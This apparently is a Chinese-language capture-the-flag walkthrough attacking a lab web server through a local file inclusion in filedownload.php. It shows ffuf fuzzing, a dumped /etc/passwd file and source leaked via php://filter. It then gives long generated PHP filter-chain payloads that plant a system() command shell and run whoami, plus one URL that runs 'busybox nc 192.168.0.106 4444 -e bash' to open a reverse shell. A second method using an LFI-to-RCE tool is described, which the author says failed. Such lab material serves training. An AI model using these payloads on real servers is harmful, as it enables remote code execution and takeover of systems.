$_SERVER['SCRIPT_FILENAME']	/var/www/html/phpsysinfo.php
$_SERVER['REMOTE_PORT']	52058
$_SERVER['GATEWAY_INTERFACE']	CGI/1.1
$_SERVER['SERVER_PROTOCOL']	HTTP/1.1
$_SERVER['REQUEST_METHOD']	GET
$_SERVER['QUERY_STRING']	no value
$_SERVER['REQUEST_URI']	/phpsysinfo.php
$_SERVER['SCRIPT_NAME']	/phpsysinfo.php
$_SERVER['PHP_SELF']	/phpsysinfo.php
$_SERVER['REQUEST_TIME_FLOAT']	1768288822.58
$_SERVER['REQUEST_TIME']	1768288822
PHP Credits
PHP Group
Thies C. Arntzen, Stig Bakken, Shane Caraveo, Andi Gutmans, Rasmus Lerdorf, Sam Ruby, Sascha Schumann, Zeev Suraski, Jim Winstead, Andrei Zmievski
Language Design & Concept
Andi Gutmans, Rasmus Lerdorf, Zeev Suraski, Marcus Boerger
PHP Authors
Contribution	Authors
Zend Scripting Language Engine 	Andi Gutmans, Zeev Suraski, Stanislav Malyshev, Marcus Boerger, Dmitry Stogov, Xinchen Hui, Nikita Popov
Extension Module API 	Andi Gutmans, Zeev Suraski, Andrei Zmievski
UNIX Build and Modularization 	Stig Bakken, Sascha Schumann, Jani Taskinen, Peter Kokot
Windows Support 	Shane Caraveo, Zeev Suraski, Wez Furlong, Pierre-Alain Joye, Anatol Belski, Kalle Sommer Nielsen
Server API (SAPI) Abstraction Layer 	Andi Gutmans, Shane Caraveo, Zeev Suraski
Streams Abstraction Layer 	Wez Furlong, Sara Golemon
PHP Data Objects Layer 	Wez Furlong, Marcus Boerger, Sterling Hughes, George Schlossnagle, Ilia Alshanetsky
Output Handler 	Zeev Suraski, Thies C. Arntzen, Marcus Boerger, Michael Wallner
Consistent 64 bit support 	Anthony Ferrara, Anatol Belski
SAPI Modules
Contribution	Authors
Apache 2.0 Handler 	Ian Holsman, Justin Erenkrantz (based on Apache 2.0 Filter code)
CGI / FastCGI 	Rasmus Lerdorf, Stig Bakken, Shane Caraveo, Dmitry Stogov
CLI 	Edin Kadribasic, Marcus Boerger, Johannes Schlueter, Moriyoshi Koizumi, Xinchen Hui
Embed 	Edin Kadribasic
FastCGI Process Manager 	Andrei Nigmatulin, dreamcat4, Antony Dovgal, Jerome Loyet
litespeed 	George Wang
phpdbg 	Felipe Pena, Joe Watkins, Bob Weinand
Module Authors
Module	Authors
BC Math 	Andi Gutmans
Bzip2 	Sterling Hughes
Calendar 	Shane Caraveo, Colin Viebrock, Hartmut Holzgraefe, Wez Furlong
COM and .Net 	Wez Furlong
ctype 	Hartmut Holzgraefe
cURL 	Sterling Hughes
Date/Time Support 	Derick Rethans
DB-LIB (MS SQL, Sybase) 	Wez Furlong, Frank M. Kromann, Adam Baratz
DBA 	Sascha Schumann, Marcus Boerger
DOM 	Christian Stocker, Rob Richards, Marcus Boerger
enchant 	Pierre-Alain Joye, Ilia Alshanetsky
EXIF 	Rasmus Lerdorf, Marcus Boerger
FFI 	Dmitry Stogov
fileinfo 	Ilia Alshanetsky, Pierre Alain Joye, Scott MacVicar, Derick Rethans, Anatol Belski
Firebird driver for PDO 	Ard Biesheuvel
FTP 	Stefan Esser, Andrew Skalski
GD imaging 	Rasmus Lerdorf, Stig Bakken, Jim Winstead, Jouni Ahto, Ilia Alshanetsky, Pierre-Alain Joye, Marcus Boerger
GetText 	Alex Plotnick
GNU GMP support 	Stanislav Malyshev
Iconv 	Rui Hirokawa, Stig Bakken, Moriyoshi Koizumi
IMAP 	Rex Logan, Mark Musone, Brian Wang, Kaj-Michael Lang, Antoni Pamies Olive, Rasmus Lerdorf, Andrew Skalski, Chuck Hagenbuch, Daniel R Kalowsky
Input Filter 	Rasmus Lerdorf, Derick Rethans, Pierre-Alain Joye, Ilia Alshanetsky
Internationalization 	Ed Batutis, Vladimir Iordanov, Dmitry Lakhtyuk, Stanislav Malyshev, Vadim Savchuk, Kirti Velankar
JSON 	Jakub Zelenka, Omar Kilani, Scott MacVicar
LDAP 	Amitay Isaacs, Eric Warnke, Rasmus Lerdorf, Gerrit Thomson, Stig Venaas
LIBXML 	Christian Stocker, Rob Richards, Marcus Boerger, Wez Furlong, Shane Caraveo
Multibyte String Functions 	Tsukada Takuya, Rui Hirokawa
MySQL driver for PDO 	George Schlossnagle, Wez Furlong, Ilia Alshanetsky, Johannes Schlueter
MySQLi 	Zak Greant, Georg Richter, Andrey Hristov, Ulf Wendel
MySQLnd 	Andrey Hristov, Ulf Wendel, Georg Richter, Johannes Schlüter
OCI8 	Stig Bakken, Thies C. Arntzen, Andy Sautins, David Benson, Maxim Maletsky, Harald Radi, Antony Dovgal, Andi Gutmans, Wez Furlong, Christopher Jones, Oracle Corporation
ODBC driver for PDO 	Wez Furlong
ODBC 	Stig Bakken, Andreas Karajannis, Frank M. Kromann, Daniel R. Kalowsky
Opcache 	Andi Gutmans, Zeev Suraski, Stanislav Malyshev, Dmitry Stogov, Xinchen Hui
OpenSSL 	Stig Venaas, Wez Furlong, Sascha Kettler, Scott MacVicar
Oracle (OCI) driver for PDO 	Wez Furlong
pcntl 	Jason Greene, Arnaud Le Blanc
Perl Compatible Regexps 	Andrei Zmievski
PHP Archive 	Gregory Beaver, Marcus Boerger
PHP Data Objects 	Wez Furlong, Marcus Boerger, Sterling Hughes, George Schlossnagle, Ilia Alshanetsky
PHP hash 	Sara Golemon, Rasmus Lerdorf, Stefan Esser, Michael Wallner, Scott MacVicar
Posix 	Kristian Koehntopp
PostgreSQL driver for PDO 	Edin Kadribasic, Ilia Alshanetsky
PostgreSQL 	Jouni Ahto, Zeev Suraski, Yasuo Ohgaki, Chris Kings-Lynne
Pspell 	Vlad Krupin
Readline 	Thies C. Arntzen
Reflection 	Marcus Boerger, Timm Friebe, George Schlossnagle, Andrei Zmievski, Johannes Schlueter
Sessions 	Sascha Schumann, Andrei Zmievski
Shared Memory Operations 	Slava Poliakov, Ilia Alshanetsky
SimpleXML 	Sterling Hughes, Marcus Boerger, Rob Richards
SNMP 	Rasmus Lerdorf, Harrie Hazewinkel, Mike Jackson, Steven Lawrance, Johann Hanne, Boris Lytochkin
SOAP 	Brad Lafountain, Shane Caraveo, Dmitry Stogov
Sockets 	Chris Vandomelen, Sterling Hughes, Daniel Beulshausen, Jason Greene
Sodium 	Frank Denis
SPL 	Marcus Boerger, Etienne Kneuss
SQLite 3.x driver for PDO 	Wez Furlong
SQLite3 	Scott MacVicar, Ilia Alshanetsky, Brad Dewar
System V Message based IPC 	Wez Furlong
System V Semaphores 	Tom May
System V Shared Memory 	Christian Cartus
tidy 	John Coggeshall, Ilia Alshanetsky
tokenizer 	Andrei Zmievski, Johannes Schlueter
XML 	Stig Bakken, Thies C. Arntzen, Sterling Hughes
XMLReader 	Rob Richards
xmlrpc 	Dan Libby
XMLWriter 	Rob Richards, Pierre-Alain Joye
XSL 	Christian Stocker, Rob Richards
Zip 	Pierre-Alain Joye, Remi Collet
Zlib 	Rasmus Lerdorf, Stefan Roehrich, Zeev Suraski, Jade Nicoletti, Michael Wallner
PHP Documentation
Authors 	Mehdi Achour, Friedhelm Betz, Antony Dovgal, Nuno Lopes, Hannes Magnusson, Philip Olson, Georg Richter, Damien Seguy, Jakub Vrana, Adam Harvey
Editor 	Peter Cowburn
User Note Maintainers 	Daniel P. Brown, Thiago Henrique Pojda
Other Contributors 	Previously active authors, editors and other contributors are listed in the manual.
PHP Quality Assurance Team
Ilia Alshanetsky, Joerg Behrens, Antony Dovgal, Stefan Esser, Moriyoshi Koizumi, Magnus Maatta, Sebastian Nohn, Derick Rethans, Melvyn Sopacua, Pierre-Alain Joye, Dmitry Stogov, Felipe Pena, David Soria Parra, Stanislav Malyshev, Julien Pauli, Stephen Zarkos, Anatol Belski, Remi Collet, Ferenc Kovacs
Websites and Infrastructure team
PHP Websites Team 	Rasmus Lerdorf, Hannes Magnusson, Philip Olson, Lukas Kahwe Smith, Pierre-Alain Joye, Kalle Sommer Nielsen, Peter Cowburn, Adam Harvey, Ferenc Kovacs, Levi Morrison
Event Maintainers 	Damien Seguy, Daniel P. Brown
Network Infrastructure 	Daniel P. Brown
Windows Infrastructure 	Alex Schoenmaker
PHP License

This program is free software; you can redistribute it and/or modify it under the terms of the PHP License as published by the PHP Group and included in the distribution in the file: LICENSE

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

If you did not receive a copy of the PHP license, or have any questions about PHP licensing, please contact license@php.net.

/prices

列目录中存在filedownload.php

http://192.168.0.100/prices/filedownload.php

访问后发现是空白页

ffuf

┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
└─# ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -u http://192.168.0.100/prices/filedownload.php?FUZZ=../index.html -fs 0 -v


        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.0.100/prices/filedownload.php?FUZZ=../index.html
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 0
________________________________________________

:: Progress: [40/6453] :: Job [1/1] :: 0 req/sec :: D:: Progress: [1085/6453] :: Job [1/1] :: 0 req/sec :::: Progress: [2237/6453] :: Job [1/1] :: 0 req/sec ::[Status: 200, Size: 39494, Words: 19456, Lines: 768, Duration: 328ms]
| URL | http://192.168.0.100/prices/filedownload.php?AssignmentForm=../index.html
    * FUZZ: AssignmentForm

:: Progress: [3055/6453] :: Job [1/1] :: 0 req/sec :::: Progress: [3418/6453] :: Job [1/1] :: 0 req/sec :::: Progress: [4523/6453] :: Job [1/1] :: 0 req/sec :::: Progress: [5696/6453] :: Job [1/1] :: 0 req/sec :::: Progress: [6453/6453] :: Job [1/1] :: 0 req/sec :::: Progress: [6453/6453] :: Job [1/1] :: 39 req/sec :: Duration: [0:00:05] :: Errors: 0 ::

| URL | http://192.168.0.100/prices/filedownload.php?AssignmentForm=../index.html

* FUZZ: AssignmentForm

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:115::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:109:116:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:110:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
rtkit:x:111:117:RealtimeKit,,,:/proc:/usr/sbin/nologin
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
cups-pk-helper:x:113:120:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false
avahi:x:115:121:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
saned:x:117:123::/var/lib/saned:/usr/sbin/nologin
nm-openvpn:x:118:124:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
hplip:x:119:7:HPLIP system user,,,:/run/hplip:/bin/false
whoopsie:x:120:125::/nonexistent:/bin/false
colord:x:121:126:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
geoclue:x:122:127::/var/lib/geoclue:/usr/sbin/nologin
pulse:x:123:128:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
gnome-initial-setup:x:124:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:125:130:Gnome Display Manager:/var/lib/gdm3:/bin/false
sssd:x:126:131:SSSD system user,,,:/var/lib/sss:/usr/sbin/nologin
kevin:x:1000:1000:kevin,,,:/home/kevin:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
ftp:x:127:134:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
sshd:x:128:65534::/run/sshd:/usr/sbin/nologin
mysql:x:129:135:MySQL Server,,,:/nonexistent:/bin/false
jane:x:1001:1001:,,,:/home/jane:/bin/bash
donald:x:1004:1004::/home/donald:/bin/rbash
randy:x:1002:1002:,,,:/home/randy:/bin/bash

http://192.168.0.100/prices/filedownload.php?AssignmentForm=php://filter//convert.base64-encode/resource=filedownload.php

尝试读取源代码

PD9waHAKICAgJGZpbGUgPSAkX0dFVFsnQXNzaWdubWVudEZvcm0nXTsKICAgaWYoaXNzZXQoJGZpbGUpKQogICB7CiAgICAgICBpbmNsdWRlKCIkZmlsZSIpOwogICB9CiAgIGVsc2UKICAgewogICAgICAgaW5jbHVkZSgiaW5kZXgucGhwIik7CiAgIH0KICAgPz4K

<?php
   $file = $_GET['AssignmentForm'];
   if(isset($file))
   {
       include("$file");
   }
   else
   {
       include("index.php");
   }
   ?>

方法一：php伪协议链反弹shell

┌──(web)─(root㉿kali)-[/home/kali/Desktop/tools/php_filter_chain_generator-main]
└─# python php_filter_chain_generator.py --chain "<?php system(\$_GET['0']);?>"
[+] The following gadget chain will generate the following code : <?php system($_GET['0']);?> (base64 value: PD9waHAgc3lzdGVtKCRfR0VUWycwJ10pOz8+)
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16|convert.iconv.WINDOWS-1258.UTF32LE|convert.iconv.ISIRI3342.ISO-IR-157|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSA_T500.UTF-32|convert.iconv.CP857.ISO-2022-JP-3|convert.iconv.ISO2022JP2.CP775|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM891.CSUNICODE|convert.iconv.ISO8859-14.ISO6937|convert.iconv.BIG-FIVE.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO88597.UTF16|convert.iconv.RK1048.UCS-4LE|convert.iconv.UTF32.CP1167|convert.iconv.CP9066.CSUCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UNICODE|convert.iconv.ISIRI3342.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UTF-16|convert.iconv.ISO6937.UTF16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.864.UTF32|convert.iconv.IBM912.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.ISO6937.8859_4|convert.iconv.IBM868.UTF-16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp

http://192.168.0.100/prices/filedownload.php?AssignmentForm=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp&0=whoami

http://192.168.0.100/prices/filedownload.php?AssignmentForm=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp&0=busybox%20nc%20192.168.0.106%204444%20-e%20bash

方法二：使用 phpinfo 从 LFI 转 RCE

https://github.com/roughiz/lfito_rce

python3 lfito_rce.py -l 'http://192.168.0.100/prices/filedownload.php?AssignmentForm=' --lhost 192.168.0.106 --lport 4444 -i 'http://192.168.0.100/phpsysinfo.php'

我没成功
